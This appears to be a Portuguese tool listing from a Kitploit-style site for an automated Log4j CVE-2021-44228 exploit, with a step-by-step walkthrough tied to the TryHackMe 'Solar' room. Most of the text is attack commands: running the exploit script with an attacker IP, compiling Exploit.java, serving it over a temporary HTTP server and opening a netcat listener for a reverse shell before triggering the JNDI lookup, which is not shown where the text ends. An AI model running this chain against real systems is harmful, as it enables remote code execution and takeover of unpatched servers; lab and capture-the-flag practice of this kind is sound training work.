Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!
log4j — Exploração automatizada do Log4j CVE-2021-44228 com servidor LDAP e compilação de payload, incluindo um passo a passo para o desafio Solar do TryHackMe. | Kitploit
Exploração automatizada do Log4j CVE-2021-44228 com servidor LDAP e compilação de payload, incluindo um passo a passo para o desafio Solar do TryHackMe.
1. execute log4j.py (Isso instalará todos os aplicativos necessários e iniciará o servidor LDAP)
root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251
2. Adicione o IP do atacante ao arquivo Exploit.java
3. Compile o payload
root@kitploit:~
javac Exploit.java -source 8 -target 8
4. servidor HTTP temporário
root@kitploit:~
python3 -m http.server 8888
5. listener do netcat
root@kitploit:~
nc -lnvp 9999
6. Finalmente, tudo o que resta fazer é acionar o exploit e disparar nossa sintaxe JNDI! Observe as mudanças no número da porta (agora referente ao nosso servidor LDAP) e no recurso que recuperamos, especificando nosso exploit: